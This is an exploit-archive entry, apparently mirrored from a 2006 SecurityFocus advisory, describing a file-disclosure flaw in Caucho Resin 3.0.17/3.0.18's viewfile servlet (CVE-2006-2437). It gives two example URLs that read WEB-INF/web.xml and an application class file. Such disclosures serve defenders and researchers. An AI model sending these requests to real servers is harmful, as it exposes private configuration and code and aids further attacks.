[] NeoSense
E X P L O I T S
title author type platform port cve id

Caucho Resin 3.0.17/3.0.18 - Viewfile Information Disclosure

Author: Joseph Pierini
type: webapps
platform: java
port: 
date_added: 2006-05-16 
date_updated: 2013-08-27 
verified: 1 
codes: CVE-2006-2437;OSVDB-25571 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/18007/info

Resin is prone to an information-disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to retrieve the contents of arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid attackers in further attacks.

http://www.example.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
http://www.example.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.